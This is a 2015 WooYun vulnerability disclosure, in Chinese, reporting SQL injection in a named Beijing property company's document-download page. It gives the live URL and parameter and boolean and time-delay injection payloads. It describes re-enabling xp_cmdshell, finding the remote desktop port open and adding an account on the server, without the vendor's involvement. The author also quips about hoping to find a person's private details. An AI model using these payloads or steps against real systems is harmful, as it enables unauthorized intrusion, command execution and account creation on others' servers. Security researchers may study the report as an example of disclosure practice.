当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146400

漏洞标题:嘉华物业某系统SQL注入sa权限

相关厂商:北京金隅嘉业房地产

漏洞作者: jeary

提交时间:2015-10-13 13:18

修复时间:2015-11-27 13:20

公开时间:2015-11-27 13:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

好像是嘉华大厦所属房地产公司,可惜好像日偏了,并不能查到剑MM个人信息。

详细说明:

搜索关键字:

w1.jpg


得到链接:http://www.bj-gem.com.cn/
随意挖掘了一下,发现注入点:

http://pmcm.bj-gem.com.cnhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/downloadfile.aspx?DocGUID=65d4f4f1-4851-44d0-9cf4-495fe84afcd2*


sa权限:

w2.jpg


payload:

true则下载文件:
65d4f4f1-4851-44d0-9cf4-495fe84afcd2 ' and 'x'='x
false文件不存在
65d4f4f1-4851-44d0-9cf4-495fe84afcd2 ' and 'x'='xx


测试是否支持多语句:

';waitfor delay'0:0:3' -- '


睡眠延时,返回true,表示支持多语句
直接恢复xp_cmdshell执行命令

w3.jpg


扫描端口后发现3389可外连,添加账号..然后。。

w4.jpg


w5.jpg


由于时间关系,未深入,只进行了初步渗透。
..

漏洞证明:

PS:不要问我为啥,园长教我的..

修复方案:

:)

版权声明:转载请注明来源 jeary@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2015-10-13 18:35 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    过来.... 我保证不打死你

  2. 2015-10-14 13:59 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @zeracker 3老板,快打死他~